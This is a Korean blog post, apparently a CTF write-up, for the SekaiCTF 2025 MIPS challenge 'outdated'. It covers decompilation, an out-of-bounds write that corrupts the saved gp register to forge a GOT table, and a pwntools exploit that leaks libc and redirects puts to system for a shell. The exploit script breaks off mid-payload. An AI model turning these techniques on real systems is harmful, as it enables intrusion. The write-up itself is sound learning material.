{"id":3923,"date":"2025-08-18T10:43:32","date_gmt":"2025-08-18T01:43:32","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3923"},"modified":"2025-08-18T10:43:33","modified_gmt":"2025-08-18T01:43:33","slug":"sekaictf2025-outdated-mips","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3923","title":{"rendered":"[SekaiCTF2025] outdated (mips)"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"375\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-1-1024x375.png\" alt=\"\" class=\"wp-image-3924\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-1-1024x375.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-1-300x110.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-1-768x281.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-1.png 1040w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">checksec<\/h2>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@c304d9296d3e:~\/study\/sekai2025\/pwn_outdated$ checksec .\/outdated \n[*] '\/home\/ubuntu\/study\/sekai2025\/pwn_outdated\/outdated'\n    Arch:       mips-32-little\n    RELRO:      Full RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        PIE enabled\n<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Decompiled-src \/ Analysis<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>IDA pseudo code<\/li>\n<\/ul>\n\n\n\n<p>\ucf54\ub4dc\ub85c \uc54c\uc544\ubcf4\uae30 \ud798\ub4e4\uae30 \ub54c\ubb38\uc5d0 ghidra\ub97c \ud65c\uc6a9\ud558\uac70\ub098 \uc5b4\uc148\ube14\ub9ac\uc5b4 \ucf54\ub4dc\ub85c \ubcf4\ub294\uac8c \ub0ab\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" 
data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int __fastcall __noreturn main(int argc, const char **argv, const char **envp)\n{\n  _DWORD v3[8]; \/\/ [sp+0h] [+0h] BYREF\n  unsigned __int16 v4; \/\/ [sp+22h] [+22h]\n  int v5; \/\/ [sp+24h] [+24h]\n  int v6; \/\/ [sp+28h] [+28h]\n  int v7; \/\/ [sp+2Ch] [+2Ch]\n  int v8; \/\/ [sp+30h] [+30h]\n  int v9; \/\/ [sp+34h] [+34h]\n  int v10; \/\/ [sp+38h] [+38h]\n\n  v3[7] = argc;\n  v3[6] = argv;\n  v6 = 6553600;\n  v7 = 19661000;\n  v8 = 32768400;\n  v9 = 45875800;\n  v10 = 87622432;\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  game_name[(_DWORD)&amp;strcspn] = 0;\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  *((_WORD *)&amp;v3[10] + v5) = v4;\n  __asm { sdc2    $25, 0($zero) # why exit here??????????? }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  printf(0, v5, v4, game_name);\n}\n<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Ghidra code<\/li>\n<\/ul>\n\n\n\n<p>\uadf8\ub098\ub9c8 \uc54c\uc544\ubcf4\uae30 \uc27d\ub2e4. 
\ud558\uc9c0\ub9cc \ub9e4\uac1c\ubcc0\uc218\ub294 \uc81c\ub300\ub85c \ucd9c\ub825\ud574\uc8fc\uc9c4 \uc54a\ub294\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\n\/* WARNING: Globals starting with '_' overlap smaller symbols at the same address *\/\n\nvoid main(void)\n\n{\n  size_t sVar1;\n  ushort local_26;\n  int local_24;\n  undefined4 local_20;\n  undefined4 local_1c;\n  undefined4 local_18;\n  undefined4 local_14;\n  undefined4 local_10;\n  undefined4 local_c;\n  \n  local_c = ___stack_chk_guard;\n  local_20 = uRam000011ac;\n  local_1c = uRam000011b0;\n  local_18 = uRam000011b4;\n  local_14 = uRam000011b8;\n  local_10 = uRam000011bc;\n  puts_blue(0xcf0);\n  puts((char *)0xffc);\n  printf((char *)0x101c,main);\n  puts((char *)0x104c);\n  fgets(game_name,0x60,_stdin);\n  sVar1 = strcspn(game_name,(char *)0x1074);\n  game_name[sVar1] = 0;\n  puts((char *)0x1078);\n  puts(game_name);\n  puts((char *)0x1094);\n  puts((char *)0x10e8);\n  scanf((char *)0x110c,&amp;local_24);\n  puts((char *)0x1114);\n  scanf((char *)0x1144,&amp;local_26);\n  *(ushort *)((int)&amp;local_20 + local_24 * 2) = local_26;\n  printf((char *)0x114c,local_24,(uint)local_26,game_name);\n  puts((char *)0x118c);\n                    \/* WARNING: Subroutine does not return *\/\n  exit(0);\n}\n\n<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Gemini(2.5 Pro) Code (IDA Assembly code \u2192 Gemini)\n<ul class=\"wp-block-list\">\n<li>\uc704 \uc5b4\uc148\ube14\ub9ac \uba85\ub839\uc5b4\ub4e4\uc744 c\uc5b8\uc5b4 \ucf54\ub4dc\ub85c \ubcc0\ud658\ud574\uc918<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p>\ubd84\uc11d\ud558\uae30 \uc88b\ub2e4. 
\ucde8\uc57d\uc810\uae4c\uc9c0 \uc54c\ub824\uc8fc\ub294 \uc0c1\ud669\uc774\ub2e4.<\/p>\n\n\n\n<p>\ubcf4\ub2e4\uc2dc\ud53c main \ud568\uc218 \uc8fc\uc18c\ub97c \ucd9c\ub825\ud574\uc8fc\uace0, game_name \uc804\uc5ed\ubc30\uc5f4\uc5d0 95\ubc14\uc774\ud2b8\ub9cc\ud07c \uc785\ub825\ubc1b\uc744 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<p>level_rewards \uc9c0\uc5ed\ubc30\uc5f4\uc5d0\uc11c OOB write \ucde8\uc57d\uc810\uc774 \ubc1c\uc0dd\ud558\uba70, level_index\ub97c \ud1b5\ud574 \uc4f0\uc5ec\uc9c8 \ub300\uc0c1 \uc8fc\uc18c, new_reward\ub85c \uc4f8 \uac12 2\ubc14\uc774\ud2b8\ub97c \uc815\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;stdlib.h>\n#include &lt;string.h>\n\n\/\/ \uc804\uc5ed \ubcc0\uc218 (\uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\uc758 dword_11AC \ub4f1\uc5d0\uc11c \ucc38\uc870)\n\/\/ \uc2e4\uc81c \uac12\uc740 \uc54c \uc218 \uc5c6\uc73c\ubbc0\ub85c \uc784\uc758\uc758 \uac12\uc73c\ub85c \ucd08\uae30\ud654\ud569\ub2c8\ub2e4.\nint dword_11AC = 100;\nint dword_11B0 = 200;\nint dword_11B4 = 300;\nint dword_11B8 = 400;\nint dword_11BC = 500;\n\n\/\/ game_name \ubc84\ud37c (fgets\uc5d0\uc11c \uc0ac\uc6a9)\nchar game_name[96];\n\n\/\/ \uc0ac\uc6a9\uc790 \uc815\uc758 \ud568\uc218 \ud504\ub85c\ud1a0\ud0c0\uc785 (\uc5b4\uc148\ube14\ub9ac\uc5d0\uc11c puts_blue\ub85c \ud638\ucd9c\ub428)\nvoid puts_blue(const char *s);\n\nint main(int argc, char *argv[]) {\n    \/\/ \uc2a4\ud0dd \ubcc0\uc218\ub4e4\n    \/\/ \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\uc758 var_18 ~ var_8 (20\ubc14\uc774\ud2b8)\uc5d0 \ud574\ub2f9\ud558\uba70\n    \/\/ short \ud0c0\uc785\uc73c\ub85c \uc811\uadfc\ub418\ubbc0\ub85c short \ubc30\uc5f4\ub85c \uc120\uc5b8\ud569\ub2c8\ub2e4.\n    short level_rewards[10];\n    \n    \/\/ var_1C, var_1E\uc5d0 \ud574\ub2f9\n  
  int level_index;\n    unsigned short new_reward;\n    \n    long stack_canary; \/\/ var_4, \uc2a4\ud0dd \ubc84\ud37c \uc624\ubc84\ud50c\ub85c\uc6b0 \ubc29\uc5b4 \uba54\ucee4\ub2c8\uc998\n\n    \/\/ \uc2a4\ud0dd \uce74\ub098\ub9ac \uc124\uc815\n    stack_canary = __stack_chk_guard;\n\n    \/\/ \uc804\uc5ed \ubcc0\uc218 \uac12\uc744 \uc2a4\ud0dd\uc758 level_rewards \ubc30\uc5f4\ub85c \ubcf5\uc0ac\n    \/\/ dword_11AC ~ dword_11BC (5\uac1c\uc758 int) \uac12\uc744 \ubcf5\uc0ac\ud569\ub2c8\ub2e4.\n    memcpy(level_rewards, &amp;dword_11AC, 20);\n\n    \/\/ \ud504\ub85c\uadf8\ub7a8 \uc2dc\uc791 \uba54\uc2dc\uc9c0 \ucd9c\ub825\n    puts_blue(\" _______  __   __  _______  ______   __...\");\n    puts(\"Welcome to the Outdated Game!\");\n    printf(\"Here's a little bit of helpful information: %p\\\\n\", main);\n\n    \/\/ \uac8c\uc784 \uc774\ub984 \uc785\ub825\ubc1b\uae30\n    puts(\"What would you like to name your game?\");\n    fgets(game_name, 96, stdin);\n\n    \/\/ fgets\ub85c \uc785\ub825\ubc1b\uc740 \ubb38\uc790\uc5f4\uc758 \ub9c8\uc9c0\ub9c9 \uac1c\ud589\ubb38\uc790(\\\\n) \uc81c\uac70\n    game_name[strcspn(game_name, \"\\\\n\")] = 0;\n\n    \/\/ \uc785\ub825\ubc1b\uc740 \uc774\ub984 \ud655\uc778 \ucd9c\ub825\n    puts(\"Great! Your game is named:\");\n    puts(game_name);\n\n    puts(\"Now, I am feeling generous today, so I'll let you change a reward.\");\n    \n    \/\/ \ubcc0\uacbd\ud560 \ub808\ubca8 \ubc88\ud638 \uc785\ub825\ubc1b\uae30\n    puts(\"Which level do you want to change?\");\n    scanf(\"%d%*c\", &amp;level_index);\n\n    \/\/ \uc124\uc815\ud560 \ubcf4\uc0c1 \uac12 \uc785\ub825\ubc1b\uae30\n    puts(\"What reward do you want to set for this level?\");\n    scanf(\"%hu%*c\", &amp;new_reward);\n\n    \/\/ --- !!! \ucde8\uc57d\uc810 \ubc1c\uc0dd \uc9c0\uc810 !!! 
---\n    \/\/ \uc0ac\uc6a9\uc790\uac00 \uc785\ub825\ud55c level_index \uac12\uc5d0 \ub300\ud55c \uac80\uc99d \uc5c6\uc774 \ubc30\uc5f4\uc5d0 \uc811\uadfc\ud558\uc5ec \uac12\uc744 \uc501\ub2c8\ub2e4.\n    \/\/ \ub9cc\uc57d \uc0ac\uc6a9\uc790\uac00 \uc74c\uc218\ub098 \ub9e4\uc6b0 \ud070 \uac12\uc744 \uc785\ub825\ud558\uba74 \uc2a4\ud0dd\uc758 \ub2e4\ub978 \uc911\uc694 \ub370\uc774\ud130\n    \/\/ (\uc608: \uc2a4\ud0dd \uce74\ub098\ub9ac, \ubc18\ud658 \uc8fc\uc18c \ub4f1)\ub97c \ub36e\uc5b4\uc4f8 \uc218 \uc788\uc2b5\ub2c8\ub2e4.\n    level_rewards[level_index] = new_reward;\n\n    \/\/ \uacb0\uacfc \ucd9c\ub825\n    printf(\"You have set the reward for level %d to %hu for game %s\\\\n\", level_index, new_reward, game_name);\n\n    \/\/ \ud504\ub85c\uadf8\ub7a8 \uc885\ub8cc\n    puts(\"Thanks for playing! Come again!\");\n    exit(0);\n}\n\n\/\/ \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\uc5d0\uc11c 'puts_blue'\ub77c\ub294 \ud568\uc218\ub97c \ud638\ucd9c\ud558\ubbc0\ub85c,\n\/\/ \uc774\ub97c C \ud568\uc218\ub85c \uad6c\ud604\ud574\uc90d\ub2c8\ub2e4. 
\uc2e4\uc81c \uae30\ub2a5\uc740 \uc54c \uc218 \uc5c6\uc73c\ub098 \uc774\ub984\uc73c\ub85c \ubcf4\uc544\n\/\/ \ud30c\ub780\uc0c9 \uae00\uc528\ub85c \ucd9c\ub825\ud558\ub294 \ud568\uc218\ub85c \ucd94\uc815\ub429\ub2c8\ub2e4.\nvoid puts_blue(const char *s) {\n    \/\/ \uc608\uc2dc: ANSI \uc774\uc2a4\ucf00\uc774\ud504 \ucf54\ub4dc\ub97c \uc0ac\uc6a9\ud558\uc5ec \ud30c\ub780\uc0c9\uc73c\ub85c \ucd9c\ub825\n    printf(\"\\\\033[0;34m\");\n    puts(s);\n    printf(\"\\\\033[0m\");\n}\n<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>MIPS \ud2b9\uc131\uc0c1 gp\ub77c\ub294 \ub808\uc9c0\uc2a4\ud130\uac00 \uc874\uc7ac\ud558\ub294\ub370, \ud574\ub2f9 \ub808\uc9c0\uc2a4\ud130\uac12\uc744 \uc2a4\ud0dd\uc5d0\uc11c \uac00\uc838\uc628\ub2e4.<\/p>\n\n\n\n<p>printf \uc774\ud6c4 \uc2e4\ud589\ub418\ub294 \ud574\ub2f9 \uc5b4\uc148\ube14\ub9ac\uc5b4\uc5d0\uc11c gp\uac12\uc744 \ub2e4\uc2dc \uc2a4\ud0dd\uc5d0\uc11c \uac00\uc838\uc628\ub2e4.<\/p>\n\n\n\n<p><strong><code>00010bec 10 00 dc 8f lw gp,local_38(s8)<\/code><\/strong><\/p>\n\n\n\n<p>\uc5ec\uae30\uc11c oob write \ucde8\uc57d\uc810\uc73c\ub85c \uc2a4\ud0dd\uc5d0 \uc800\uc7a5\ub41c gp \ud558\uc704 2\ubc14\uc774\ud2b8\uac12\uc744 \uc218\uc815\ud574\uc900\ub2e4. \uc704\uc870\uc2dc\ud0ac got \ud14c\uc774\ube14 \ub370\uc774\ud130\ub97c game_name\uc5d0 \uc4f4 \ub2e4\uc74c \uac00\ub9ac\ud0a4\uac8c \ud558\uba74, GOT \ud14c\uc774\ube14\uc744 \uc704\uc870\uc2dc\ud0ac \uc218 \uc788\ub2e4. 
Full RELRO \ub54c\ubb38\uc5d0 \uc2e4\uc81c GOT \ud14c\uc774\ube14\uc740 \uc218\uc815\ud560 \uc218 \uc5c6\uc9c0\ub9cc, \ud568\uc218 \ud638\ucd9c \uc774\ud6c4 gp\ub97c \uc2a4\ud0dd\uc5d0\uc11c \ub2e4\uc2dc \uac00\uc838\uc628 \ub2e4\uc74c gp \uc0c1\ub300 \uc8fc\uc18c\ub85c GOT\ub97c \ucc38\uc870\ud558\ubbc0\ub85c, \uc800\uc7a5\ub41c gp \uac12\ub9cc \uc218\uc815\ud574\ub3c4 \uc704\uc870\ud55c \ud14c\uc774\ube14\uc744 \uc0ac\uc6a9\ud558\uac8c \ub41c\ub2e4.<\/p>\n\n\n\n<p>\ud765\ubbf8\ub85c\uc6b4 \uc810\uc740 GOT \ud14c\uc774\ube14\uc5d0\ub294 \ud568\uc218 \uc8fc\uc18c \ubfd0\ub9cc \uc544\ub2c8\ub77c \ucd9c\ub825\uc2dc\ud0ac &#8220;Thanks for playing! 
Come again!&#8221; \ubb38\uc790\uc5f4 \uc8fc\uc18c\ub3c4 \uc800\uc7a5\ud558\uace0 \uc788\ub2e4\ub294 \uc810\uc774\ub2e4.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>ghidra \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc + c\uc5b8\uc5b4 \ucf54\ub4dc \ubd80\uc5f0\uc124\uba85<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">        00010bc0 e8 ff 43 a4     sh         v1,-0x18(v0)\n        00010bc4 24 00 c2 8f     lw         v0,local_24(s8)\n        00010bc8 22 00 c3 97     lhu        v1,local_26(s8)\n        00010bcc 38 80 87 8f     lw         a3=>game_name,-0x7fc8(gp)=>->game_name           = ??\n                                                                                             = 000300c0\n        00010bd0 25 30 60 00     or         a2,v1,zero\n        00010bd4 25 28 40 00     or         a1,v0,zero\n*** printf(\"You have set the reward for level %d to %hu for game %s\\\\n\", level_index, new_reward, game_name); ***\n        00010bd8 30 80 82 8f     lw         v0,-0x7fd0(gp)=>PTR_00030030                     = 00000000\n        00010bdc 4c 11 44 24     addiu      a0,v0,0x114c\n        00010be0 8c 80 82 8f     lw         v0,-0x7f74(gp)=>->&lt;EXTERNAL>::printf             = 00010c20\n        00010be4 25 c8 40 00     or         t9,v0,zero\n        00010be8 00 00 19 f8     jialc      t9=>&lt;EXTERNAL>::printf,0x0                       int printf(char * __format, ...)\n*** puts(\"Thanks for playing! 
Come again!\"); ***\n        **00010bec 10 00 dc 8f     lw         gp,local_38(s8)**\n        00010bf0 30 80 82 8f     lw         v0,-0x7fd0(gp)=>PTR_00030030                     = 00000000\n        00010bf4 8c 11 44 24     addiu      a0,v0,0x118c\n        **00010bf8 7c 80 82 8f     lw         v0,-0x7f84(gp)=>->&lt;EXTERNAL>::puts               = 00010c40**\n        00010bfc 25 c8 40 00     or         t9,v0,zero\n        00010c00 00 00 19 f8     jialc      t9=>&lt;EXTERNAL>::puts,0x0                         int puts(char * __s)\n*** C CODE: exit(0); ***\n        00010c04 10 00 dc 8f     lw         gp,local_38(s8)\n        00010c08 25 20 00 00     or         a0,zero,zero\n        **00010c0c 54 80 82 8f     lw         v0,-0x7fac(gp)=>->&lt;EXTERNAL>::exit               = 00010c80**\n        00010c10 25 c8 40 00     or         t9,v0,zero\n        **00010c14 00 00 19 f8     jialc      t9=>&lt;EXTERNAL>::exit,0x0**                         void exit(int __status)\n                             -- Flow Override: CALL_RETURN (COMPUTED_CALL_TERMINATOR)\n\n<\/pre>\n\n\n\n<p>\ud544\uc790\ub294 puts \ub300\uc2e0\uc5d0 puts_blue\ub85c, \u201cThanks for playing!\u2026\u201d \uc8fc\uc18c \ub300\uc2e0\uc5d0 puts@got \uc8fc\uc18c\ub97c \ub123\uc5b4\uc11c libc \uc8fc\uc18c\ub97c \uad6c\ud560 \uc218 \uc788\uc5c8\uace0 exit \ub300\uc2e0\uc5d0 main \ud568\uc218\ub97c \ub123\uc5b4\uc11c \ud55c\ubc88\ub354 main \ud568\uc218\ub97c \ud638\ucd9c\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n<p>\ud55c\ubc88\ub354 got \ud14c\uc774\ube14\uc744 \ubcc0\uc870\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n<p>\uc774\ubc88\uc5d0\ub294 puts \ub300\uc2e0\uc5d0 system, \u201cThanks for playing!\u2026\u201d \uc8fc\uc18c \ub300\uc2e0\uc5d0 \/bin\/sh\ub97c \uac00\ub9ac\ud0a4\uac8c \ud558\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">solve.py<\/h2>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" 
data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#!\/usr\/bin\/env python3\n\nfrom pwn import *\ncontext.log_level = 'debug'\ncontext(arch='mips', os='linux', bits=32, endian='little')\nwarnings.filterwarnings('ignore')\nimport sys\n\np = remote(\"127.0.0.1\", 1337)\n# p = process(\".\/run2_dbg.sh\")\n# p = process(\".\/run2.sh\")\n\n# p = remote(\"host3.dreamhack.games\", 10296)\ne = ELF('.\/outdated',checksec=False)\n# l = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\nl = ELF('.\/target\/lib\/libc.so', checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\nip = lambda: input()\npi = lambda: p.interactive()\n\nru(b\"Here's a little bit of helpful information:\")\nleak = rl().strip()\nleak = int(leak, 16)\ninfo(f\"leak: {hex(leak)}\")\n\ne.address = leak - e.sym.main\npie_base = e.address\ninfo(f\"pie_base: {hex(e.address)}\")\n\n# pay = p32(e.sym.main + 0x1f0)\n# pay += b\"ABCDEFGHIJKL\"\n# pay += p32(e.sym.exit) + b\"QRSTUVWXYZabcdefghijk;lmnopqrstuvwxyz0123456789\"\n# pay = pay + b\"\\\\x41\"*(0x5f-len(pay))\n\n# guessed_libc_base = pie_base - 0x8f4000 # = 0x3f70c000\n# info(f\"guessed_libc_base: {hex(guessed_libc_base)}\")\n# l.address = guessed_libc_base\n\n# pay = b\"A\"*0x5f\n#fake gp!!!! fake got!!!!\npay = p32(e.got.puts - 0x118c) #.got:40020030                 .word _stdout            # string by puts\npay += p32(e.sym.puts_blue)     #puts_blue\npay += p32(0)    #game_name\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #_stdout... 
dummy?\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #__register_frame_info_ptr... dummy?\npay += p32(0)    #__libc_start_main_ptr\npay += p32(0)   #setbuf\npay += p32(e.sym.main)   #exit_ptr\npay += p32(0)   #stderr_ptr\npay += p32(0)   #scanf_ptr\npay += p32(0)   #strcspn_ptr\npay += p32(0)   #_ITM_deregisterTMCloneTable_ptr\npay += p32(0)   #stdin_ptr\npay += p32(0)   #_ITM_registerTMCloneTable_ptr\npay += p32(0)   #__deregister_frame_info_ptr\npay += p32(0)   #__stack_chk_fail_ptr\npay += p32(0)   #__cxa_finalize_ptr\npay += p32(e.sym.puts_blue)   #puts_ptr x: 0xab4~0xab0-4*5\npay += p32(0)   #fgets_ptr\npay += p32(0)   #__stack_chk_guard_ptr\npay += p32(0)   #stdout_ptr\n# pay += p32(l.sym.system)   #printf_ptr\n\nsla(b\"What would you like to name your game?\\\\n\", pay)\n\npay = str(-12) #\uc2a4\ud0dd \ud504\ub808\uc784\uc5d0 \uc788\ub294 gp \ud558\uc7044\ubc14\uc774\ud2b8 \uc218\uc815\n# pay = str(int((e.got.puts\/2)-0x40))\n# pay = str(0x41414141) #32\ube44\ud2b8 \uc815\uc218\nsla(\"Which level do you want to change?\\\\n\", pay)\n\npay = str(0x8000+0x4*(17+19)) #16\ube44\ud2b8 \uc815\uc218\nsla(\"What reward do you want to set for this level?\\\\n\", pay)\n\n'''\n.got:00020010  # ===========================================================================\n.got:00020010\n.got:00020010  # Segment type: Pure data\n.got:00020010                 .data # .got\n.got:00020010 off_20010:      .word _stdout            # DATA XREF: sub_6F0\u2191o\n.got:00020010                                          # sub_740\u2191o ...\n.got:00020014                 .word 0x80000000\n.got:00020018 _term_proc_ptr: .word _term_proc\n.got:0002001C _init_proc_ptr: .word _init_proc\n.got:00020020 main_ptr:       .word main\n.got:00020024                 .word unk_20004\n.got:00020028 __RLD_MAP_ptr:  .word __RLD_MAP\n.got:0002002C                 .word off_20090\n.got:00020030                 .word _stdout   &lt;- string by puts\n.got:00020034 puts_blue_ptr:  .word puts_blue 
&lt;- fake gp start !!!!!!!!!!!!!! fake_gp = 0x200c0 \n.got:00020038 game_name_ptr:  .word game_name\n.got:0002003C                 .word _stdout\n.got:00020040                 .word _stdout\n.got:00020044                 .word _stdout\n.got:00020048 __register_frame_info_ptr:.word __register_frame_info\n.got:0002004C __libc_start_main_ptr:.word __libc_start_main\n.got:00020050 setbuf_ptr:     .word setbuf\n.got:00020054 exit_ptr:       .word exit !!!!!!!!!!!!!\n                                        exit \ub300\uc2e0\uc5d0 main \ub4e4\uc5b4\uac00\uac8c \ub9cc\ub4dc\ub294\uac74 \uc26c\uc6c0, \uc790\uccb4\uc801\uc73c\ub85c write\ud558\uba74 \ub418\ub2c8\uae4c ... +0x10\ud558\uba74 _ITM_deregisterTMCloneTable?\n                                        \uc2e4\uc81c\ub85c \uc27d\uc9c0 \uc54a\uc74c;; -0x34 \ub610\ub294 game_name\uae4c\uc9c0 \ub2e4\ub2e4\ub974\uae30 \uc704\ud574 \ucd5c\uc18c +0x6c \uc774\uc0c1\n.got:00020058 stderr_ptr:     .word stderr\n.got:0002005C scanf_ptr:      .word scanf\n.got:00020060 strcspn_ptr:    .word strcspn\n.got:00020064 _ITM_deregisterTMCloneTable_ptr:.word _ITM_deregisterTMCloneTable \n.got:00020068 stdin_ptr:      .word stdin\n.got:0002006C _ITM_registerTMCloneTable_ptr:.word _ITM_registerTMCloneTable\n.got:00020070 __deregister_frame_info_ptr:.word __deregister_frame_info\n.got:00020074 __stack_chk_fail_ptr:.word __stack_chk_fail\n.got:00020078 __cxa_finalize_ptr:.word __cxa_finalize\n.got:0002007C puts_ptr:       .word puts  !!!!!!!! puts \ub300\uc2e0\uc5d0 main\uc5d0 \ub4e4\uc5b4\uac00\ub824\uba74... 
-0x5c\ud574\uc11c got\uc758 main \uac00\ub9ac\ud0a4\uac70\ub098, \ub610\ub294 +0x44\ud574\uc11c game_name\uae4c\uc9c0 \ub2e4\ub2e4\ub974\uae30\n                                            puts \ub300\uc2e0\uc5d0 printf \ub4e4\uc5b4\uac00\ub824\uba74,,,+0x10 \ub354\ud574\uc57c\ud568;; 2007c-0x34 = 20048; __register_frame_info\n                                            puts \ub300\uc2e0\uc5d0 puts_blue \ub4e4\uc5b4\uac00\ub824\uba74, \n.got:00020080 fgets_ptr:      .word fgets   \n.got:00020084 __stack_chk_guard_ptr:.word __stack_chk_guard\n.got:00020088 stdout_ptr:     .word stdout\n.got:0002008C printf_ptr:     .word printf\n.got:0002008C\n.sdata:00020090  # ===========================================================================\n.sdata:00020090\n.sdata:00020090  # Segment type: Pure data\n.sdata:00020090                 .sdata\n.sdata:00020090 off_20090:      .word off_20090          # DATA XREF: sub_7B4+30\u2191o\n.sdata:00020090                                          # sub_7B4+3C\u2191r ...\n.sdata:00020090\nLOAD:00020094  # ===========================================================================\nLOAD:00020094\nLOAD:00020094  # Segment type: Pure data\nLOAD:00020094                 .data # LOAD\nLOAD:00020094                 .align 4\nLOAD:00020094\n.bss:000200A0  # ===========================================================================\n.bss:000200A0\n.bss:000200A0  # Segment type: Uninitialized\n.bss:000200A0                 .bss\n.bss:000200A0 dword_200A0:    .space 4                 # DATA XREF: sub_7B4+20\u2191r\n.bss:000200A0                                          # sub_7B4+70\u2191w\n.bss:000200A4 dword_200A4:    .space 4                 # DATA XREF: sub_838+2C\u2191o\n.bss:000200A8                 .space 4\n.bss:000200AC                 .space 4\n.bss:000200B0                 .space 4\n.bss:000200B4                 .space 4\n.bss:000200B8                 .space 4\n.bss:000200BC                 .space 4\n.bss:000200C0                 
.globl game_name\n.bss:000200C0  # _BYTE game_name[96]\n.bss:000200C0 game_name:      .space 0x60              # DATA XREF: LOAD:000003D8\u2191o\n'''\n# ru(\"your game\")\n# rl()\nleak = ru(\".\\\\n\")\nleak = rl()\n# leak = r(4)\nleak = leak[5:5+4]\nleak = uu32(leak)\n# info(f\"leak: {(leak.hex())}\")\ninfo(f\"leak: {(hex(leak))}\")\nl.address = leak - l.sym.puts\n\n#main again\n#fake gp!!!! fake got!!!!\npay = p32(l.address + 0xAAF20 - 0x118c) #.got:40020030                 .word _stdout            # string by puts\npay += p32(l.sym.system)     #puts_blue\npay += p32(0)    #game_name\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #__register_frame_info_ptr... dummy?\npay += p32(0)    #__libc_start_main_ptr\npay += p32(0)   #setbuf\npay += p32(e.sym.main)   #exit_ptr\npay += p32(0)   #stderr_ptr\npay += p32(0)   #scanf_ptr\npay += p32(0)   #strcspn_ptr\npay += p32(0)   #_ITM_deregisterTMCloneTable_ptr\npay += p32(0)   #stdin_ptr\npay += p32(0)   #_ITM_registerTMCloneTable_ptr\npay += p32(0)   #__deregister_frame_info_ptr\npay += p32(0)   #__stack_chk_fail_ptr\npay += p32(0)   #__cxa_finalize_ptr\npay += p32(l.sym.system)   #puts_ptr x: 0xab4~0xab0-4*5\npay += p32(0)   #fgets_ptr\npay += p32(0)   